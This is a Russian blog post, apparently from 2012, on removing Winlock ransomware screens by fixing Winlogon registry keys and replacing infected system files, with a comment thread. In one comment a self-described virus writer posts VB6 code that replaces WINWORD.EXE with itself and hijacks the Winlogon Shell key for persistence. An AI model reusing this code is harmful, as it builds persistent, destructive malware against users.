• 353789
  • 1082
  • 54
Нравится блог?
Подписывайтесь!

Порно — баннеры: опасно, но не смертельно

порно,порно-баннер,winlock,Trojan.winlock,Windows заблокирован!

Интернет развивается с неумолимой скоростью, появляется все больше и больше злобных хакеров, которые конечно тоже хотят кушать, но методы их крайне безобразны! Наверное, все уже сталкивались с баннером, который открывается на весь экран и выдает сообщение, мол, вы такой — сякой, качаете и распространяете порнуху, за это вам штраф! Оплатите немедленно (обычно дают до 24 часов) или же вся информация, в т.ч и Bios будут стерты. Если вылезло такое окно у вашего сына, брата, жены — не переживайте! Они не извращенцы. Порно — баннер можно подцепить где угодно, от безобидного автомобильного портала и до (как это не иронично) порно сайта. Кстати на нашем сайте вы такого не поймаете! =)
Что же делать? Можно, конечно же, переустановить Windows, можно отнести компьютер к мастерам и заплатить денежку, можно загрузится под виртуальной виндой или же под линуксом и проверить диск С на вирусню. Но лучшим вариантом будет самостоятельно разобраться в сей проблеме, что бы в будущем быть подкованным в этом вопросе.

К примеру, принесли мне ноутбук, а там красуется надпись следующего содержания:

Министерство внутренних дел Республики Казахстан.
Windows заблокирован! Microsoft Security обнаружил нарушения использования сети интернет.
Причина: Просмотр и распространения детского – ГЕЙ порно.
Для разблокировки Windows необходимо оплатить штраф в размере 15000тенге.
Далее идет инструкция на оплату штрафа, с указание номера кошелька – 77774193606.

Порядочный скрин у меня сделать не получилось, так что смотрите ролик:

В похожих случаях вам может помочь загрузочный диск Alkid Live CD
С него можно загрузиться, как под виртуальной операционной системой, найти в меню пуск – утилиты – редактор реестра и пройти по ветке:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Затем ПКМ открыть этот shell, и если в его значении вместо explorer.exe записана какая — то другая дребедень, то вас можно поздравить, вы нашли заразу! Там же увидите адрес, где она сидит. Сразу идете туда и удаляете ее оттуда.

Но в моем случае это не помогло, то ли Live CD не тот, то ли из-за того что я именно из нотика его выживал. (С ноутбуками постоянно, какая-то ерунда в этой сфере) Поэтому, решить проблему можно только при правильном подходе. При загрузке мы видим, что как меню «Пуск» так и диспетчер задач, работать категорически отказываются. Проблема с загрузкой. Следовательно, можно догадаться, а можно погуглить и выяснить, что злобный троян записал себя в следующие файлы:

Userinit.exe — является частью операционных систем Windows и отвечает за процесс загрузки системы.
Taskmgr.exe — стандартный диспетчер задач в Windows.

В общем, нам всего лишь нужно, найти эти файлы на другом компьютере с установленной XP или с Live CD можно выдрать. Файлы находятся в папке A386\System32. И заменить на инфицированные аналоги. Тем самым мы сможем все-таки запустить диспетчер задач при загрузке.

Для удобства выложил на deposit:
Userinit.exe
Taskmgr.exe

Что бы заменить файлы, грузимся под Alkid Live CD или аналогичной виртуалкой. Еще можно выполнить эти действия из под DOS-a (может быть остались еще такие люди, которые это умеют=))
Файлы ищутся на диске С и стандартным поиском находятся без проблем, особенно если в поиск прописывать название файла вместе с расширением.

Находим. Заменяем. Перезагружаемся.

Снова это порно – окно? Не переживайте! Жмите Ctrl+Alt+Delete или Ctrl +Shift+Esc
Если диспетчер задач мигает и пропадает, то зажимаете это сочетание клавиш и зажимаете шапку диспетчера мышкой. Теперь не пропадет. Там жмете – «Новая задача» и вписываете функцию «regedit» т.е редактор реестра. И уже там проходите по вышеупомянутой ветке:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

порно,порно-баннер,winlock,Trojan.winlock,Windows заблокирован!

Затем ПКМ открываете shell, и если в его значении вместо explorer.exe записана какая — то другая дребедень, то вас можно по-настоящему поздравить, вы нашли заразу! Там же адрес, где она сидит. Сразу идете туда и удаляете. Но как открыть мой компьютер? – Спросите вы. А очень просто. Снова жмете «Новая задача» в Диспетчере устройств, и в поле вписываете «Explorer.exe» открывается привычное для глаза окно, в котором вы можете спокойно перемещаться по компьютеру. Так же желательно проверить компьютер каким нибудь лаучером, Dr Web например. Запустите с флешки и проверьте компьютер на наличие скрытых копий вируса, если что то подобное есть, он обязательно найдет и обезвредит.

Хотел вирус на память сохранить, но злобный Nod 32, удалил его немедленно после перезагрузки системы

После этого смело перезагружаетесь. PC включится без проблем.

порно,порно-баннер,winlock,Trojan.winlock,Windows заблокирован!

P.S Таких вирусов — вымогателей в интернете огромное множество, не вздумайте нести деньги, никто вам не даст гарантии, что вы потом сможете его разблокировать. И Windows сломя голову переустанавливать не нужно. В основном, все вирусы такого рода, уничтожаются вышеописанным способом. Помимо Shell, вирус может записаться и в:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

В общем смотрите загрузочный разделы реестра.
Антивирусные компании занимаются этой проблемой. К примеру пройдя по ссылке, вы попадете на сайт Dr. Web, где можно попробовать подобрать код активации по картинке или номеру телефона/кошелька мошенника.

P.P.S Если вы знаете, какие — то другие способы лечения данного вируса, пишите в комментариях, все обсудим, обмозгуем.

P.P.P.S Если статья вам показалась полезной, просьба расшарить ее по социальным сетям, нажав на кнопочки, которые вы видите чуть ниже.

Источник: iPort

Алекcандр Романов Romanoff
обомне
7 апреля 2012, 9:23
13724

Loading...

Комментарии

Всего лишь 1 день танцев с бубном и вирус повержен!!! ))
Много возни.
Юзал Eset Live cd. В нее уже встроена тулза под названием userinit, которая находит и обезвреживает два троянских файла.
Да и интерфейс KDE намного лучше чем прыщи.
Комментарий удалён автором поста.
никогда такая хрень меня не посещала...что я не так делаю?
хотите посещений?))
неа не хочу. но блин - один и тот же тырнет у меня и у других, не понимаю ))
неа не стоит, щас НОД стоит
у меня каспер 12й стоит, ни разу не ловил а нод32 пропускает, буквально на той неделе удалял эту какость у подчиненной, но у нее 7ка, так что просто восстановление системы сделал на вчерашний день и все пучком )
я к чему все эти вопросы задаю - неча на зеркало пенять, коль рожа крива. жмакаем кудой попало не думая, а потом нод виноват (или касперский или еще ктонить).
Было и такое, правда у меня просили 3000 тг и в течении 12 часов. Ну, ничего, после 3-х часов матов, нервов все удалось)) Я поступила так: фокус с ctrl+alt+delete не получился, не хотел диспетчер выходить, на помощь пришел F8, затем safe mode (безопасный режим), далее написала в командную строку regedit, и понеслась HKEY_LOCAL_MACHINE -> SOFTWARE -> Microsoft -> Windows NT -> CurrentVersion -> Winlogon/Shell explorer.exe, вместо explorer.exe, у меня была какая-то каляка-маляка, исправила, перезагружаю, и что вы думаете? Не загружается:)) Злости не было предела)) нашла антилок в нете, скачала на флешку(все действия с другого компьютера), флешку в больной комп. сунула, сделала как сказано в нете и все, моим мучениям прошел конец!!!
в мною описанном случае, в безопасном режиме вылазила такая же каляка-маляка про 15 тыс )
кстати можно было бы тут же заменить эти 2 инфицированных файла и проблема бы решилась.
Dr_Rat
0
0
Автор, ты ведать нифига не соображаешь, а статью наколякал. Послушай, вирус еще может быть прописан в систему под приложением logonui.exe который кстати является системным, но очень легко поддается изменению с помощью 1 программы. Далее прописывается права и пароль на учетку. Все вирус пойман, как ты великий будешь поступать? Надо тебе еще сказать, что вирус может быть прописан в HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon в случае 64 битной оси и HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon в случае 32 битной оси соответственно. Еще тут: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon тут тоже кстати в параметрах Shell. Прежде чем писать, почитай, посмотри, проанализируй.
Считается. Мужик, ты не глуп. Но я тоже работаю системным администратором (только в частном учреждении) и это задевает мои администраторские чувства!
Во первых скажу,давайте не будем вдаваться в крайности, исходя из вышесказанного, могу аналогично сообщить что еще может быть, что вирус прописан в бубне и если им позвенеть то Ктулху нас всех сожрет!!!
Во вторых, мужик, если ты такой умный (можешь считать это комплиментом), то почему бы тебе вместо того чтобы писать вирусы, писать статьи как избавляться от подобных. А то рекурсия какая то получается, ты отправляешь вирус в лабораторию, затем модернизируешь (что бы я в поте лица его выковыривал), затем затем опять отправляешь в лабораторию.. Что дальше?
И в третьих. Я не писал инструкцию как избавляться от всех подобных вирусов, не писал и о том как взламывать пароли мегалайн, т.к считаю это безнравственно, (кстати существует способ и по проще)
Я просто описал как особо не напрягаясь, среднестатистическому юзеру, избавиться от данного вида вирусов, т.к считаю это актуальным, работаю в этой сфере не первый год, и описываю только то, с чем сталкиваюсь лично, а обслуживаю больше 50 арм + лечение подобного добра в свободное от работы время, естественно не бесплатно. а то что ты написал ниже, только подтверждает, что адекватности тебе увы, не хватает.
А еще вирус может быть прописан еще в 1000 и 1-м месте. И в чем суть твоего наезда на автора, не понятно.
Dr_Rat
0
0
Да кстати меня, всегда, поражают слова "Нод пропускает", "Каспер пропускает". Да будет вам известно, что добавляют их в базы люди. Которые работают сутками и каждый присланный файл проверяют на вирус с помощью декомпилирования приложения. За 2011 год работая в государственном учреждении системным администратором, я прислал в лабораторию нод32 около 8 вирусов, из них 2 написанные мною как возможный вариант мутации предыдущих. В числе присланных вирусов был Windows Locker. Варианты, написанные мною, лично ты "выковыривать" из системы бы устал! Если нод32 или каспер пропустил вирус, найдите его и пришлите им в лабораторию, тем самым вы поддержите своего «Любимого» антивируса!
что еще скажешь?
Dr_Rat
0
0
ДЕБИЛ ТЫ ! ПОЙДЕТ ? ПИШИ НОРМАЛЬНЫЕ СТАТЬИ !
Комментарий удалён автором поста.
что ты, что ты, ты же меня знаешь )))
для удобства на депозит???? пепец... таких как ты на руборде банят...
к сожалению, в казахстане файлообменников не осталось, а депозит прост в использовании, если кому то, всерьез нужно устранить неполадку, то 60 сек для него подождать не станет проблемой.
Напиши заголовок правильно, а то он сейчас взрывает мозги прямо на главной — "Порно-баннеры: опасно, но не смертельно".
на то и расчет )))
Никто не видел столько порнухи, сколько ее видел интернет експлорер ))))
Linux пользователь:
- Порно баннер? Нет не слышал :)
а если позвонить по этому номеру 77774193606 и сказать все, что о них думаешь?
Dr_Rat
0
0
Private Sub Form_Load()
App.TaskVisible = False
F = FreeFile
Open Environ("WINDiR") & "\system32" & "\DSSHELLKILLOFFICE.BAT" For Append As #1
Print #1, "taskkill /F /IM WINWORD.exe"
Close #1
Shell Environ("WINDiR") & "\system32" & "\DSSHELLKILLOFFICE.BAT"
On Error Resume Next
Call CetValueInfo(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe", "Path")
Label1.Caption = InfFromValue
Kill Label1.Caption & "WINWORD.EXE"
Name Label1.Caption & "WINWORD.exe" As Label1.Caption & "SDSOAL32.DLL"
Call CreateKeyStr(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\", "Shell", "Explorer.exe, " & Environ("WINDiR") & "\system32" & "\WINWORDSD32.exe")
Call CreateKeyStr(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\", "Shell", "Explorer.exe, " & Environ("WINDiR") & "\system32" & "\WINWORDSD32.exe")
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", Label1.Caption & "WINWORD.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("WINDiR") & "\system32" & "\WINWORDSD32.exe"
Kill Environ("WINDiR") & "\system32" & "\DSSHELLKILLOFFICE.BAT"
Label2.Caption = App.Path & "\"
If Label1.Caption = Label2.Caption Then
Form1.Hide
Form2.Show
Else
Me.Hide
Shell Label1.Caption & "WINWORD.EXE"
End If
End Sub
Вот на этот код нод32 и каспер реагирует как на вирус. Это один из многих модификаций присланных в лаборатории антивирусов. В итоге пользователь запустит или оно удаленно загрузится к нему с сайта с помощью эксплойта и увидит вот такое окно:pjOFrT1mG2lF7q1PH1fIvBq3rmH1Nc.jpg
По изображению надеюсь поймешь что произошло? По коду, пошаговый ход заражения расскажешь?
Delphi это уже старый век. Никогда в него особо не углублялся.
Dr_Rat
0
0
Это не Delphi, это распространенный язык программирования Visual Basic 6.0 версии. Кстати очень легко на нем пишутся вирусы и прочая нечисть.
Всем привет. Может это кому-нибудь поможет.
Я убрал порно-баннер следующим образом:
1) запустил Alkid Live CD
2) зашёл в реестр HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
там в поле Значение стояло userinit, заменил на C:\WINDOWS\system32\userinit.exe.
Перегрузился и всё исчезло.

Оставьте свой комментарий

Спасибо за открытие блога в Yvision.kz! Чтобы убедиться в отсутствии спама, все комментарии новых пользователей проходят премодерацию. Соблюдение правил нашей блог-платформы ускорит ваш переход в категорию надежных пользователей, не нуждающихся в премодерации. Обязательно прочтите наши правила по указанной ссылке: Правила

Также можно нажать Ctrl+Enter

Популярные посты

«Мурашки по коже». Выступление Димаша Кудайбергенова впечатлило иностранцев

«Мурашки по коже». Выступление Димаша Кудайбергенова впечатлило иностранцев

21-го января сообщество "Казахстан разместило на своей странице фейсбук видео с выступлением Димаша Кудайбергенова c песней "S.O.S" на китайском конкурсе Singer 2017.  Данное видео стало вирусным...
Levlion999
15 февр. 2017 / 15:06
  • 22380
  • 4
Правильный пиар или Как нас достали новости о Баян Есентаевой

Правильный пиар или Как нас достали новости о Баян Есентаевой

Побитое личико Баян светилось со всех экранов, неважно – телевизионных или компьютерных. Казахстанское интернет-сообщество, забыв про терроризм и земельную реформу, обсасывало личную жизнь Есентаевой.
Timur_Tregulov
13 февр. 2017 / 16:20
  • 9013
  • 8
Известные казахи, женившиеся на русских женщинах

Известные казахи, женившиеся на русских женщинах

Говорят, что за каждым великим мужчиной стоит женщина. А еще говорят что, все великие люди меняют судьбу своего народа. Так давайте узнаем больше о русских женщинах, навсегда изменивших жизнь...
Shala-Kazakh
17 февр. 2017 / 23:21
  • 8379
  • 55
Кто примет армию иностранных туристов? Топ-7 лучших гостиниц Кызылорды

Кто примет армию иностранных туристов? Топ-7 лучших гостиниц Кызылорды

Если вдруг по различным причинам вы собрались посетить город на берегу Сырдарьи, но при этом не знаете, где остановиться, вам поможет наш Топ. Топ-7 лучших гостиниц Кызылорды.
socium_kzo
13 февр. 2017 / 9:55
  • 7587
  • 5
У нас зарплаты в 3 раза ниже, чем в Болгарии. А мы говорим о самом дешевом бензине, хлебе и воде

У нас зарплаты в 3 раза ниже, чем в Болгарии. А мы говорим о самом дешевом бензине, хлебе и воде

Многие у нас любят сравнивать цены в Казахстане с ценами в Европе. Как мол у нас все дешево! При этом они забывают о том, что минимальный размер оплаты труда на Западе в разы выше, чем у нас.
AliyaSadyrbaeva
15 февр. 2017 / 0:43
  • 6203
  • 52
Келин XX века vs келин XXI века. Если сейчас легче жить, то почему разводов стало больше?

Келин XX века vs келин XXI века. Если сейчас легче жить, то почему разводов стало больше?

Часто слышу от пожилых «апашек» слова разочарования, когда они в очередной раз узнают новость про развод семьи. В основном рассуждения начинаются с фразы «біздің кезімізде»...
socium_kzo
15 февр. 2017 / 15:47
  • 5977
  • 75
«Мужчины, живущие с родителями после 25 лет». Опрос набирает популярность в сети

«Мужчины, живущие с родителями после 25 лет». Опрос набирает популярность в сети

"Как вы относитесь к мужчинам, которые в 25+ еще живут с родителями?". Опрос, который набирает популярность в соцсетях. Хотелось бы узнать, что же думаете вы по этому поводу?
Muchacho55
15 февр. 2017 / 18:51
Места для уличного секса в Алматы. Не будьте ханжами, уятменами и моралфагами!

Места для уличного секса в Алматы. Не будьте ханжами, уятменами и моралфагами!

Не будьте ханжами, уятменами и моралфагами, будьте доброжелательней и скиньте уже с себя цепи и оковы нравственности. Да здравствует любовь и свобода!
gelberdeuet
14 февр. 2017 / 11:00
  • 4804
  • 98
Не всегда девушки виноваты, что у них нет парней, иногда парни сами не готовы к отношениям

Не всегда девушки виноваты, что у них нет парней, иногда парни сами не готовы к отношениям

Дневник одинокой астанчанки, которая пытается разобраться в себе и в своих отношениях. Мне всего 25, скоро начнутся постоянные разговоры родственников и друзей с извечным вопросом: "Когда замуж?".
woman_in_black
13 февр. 2017 / 10:30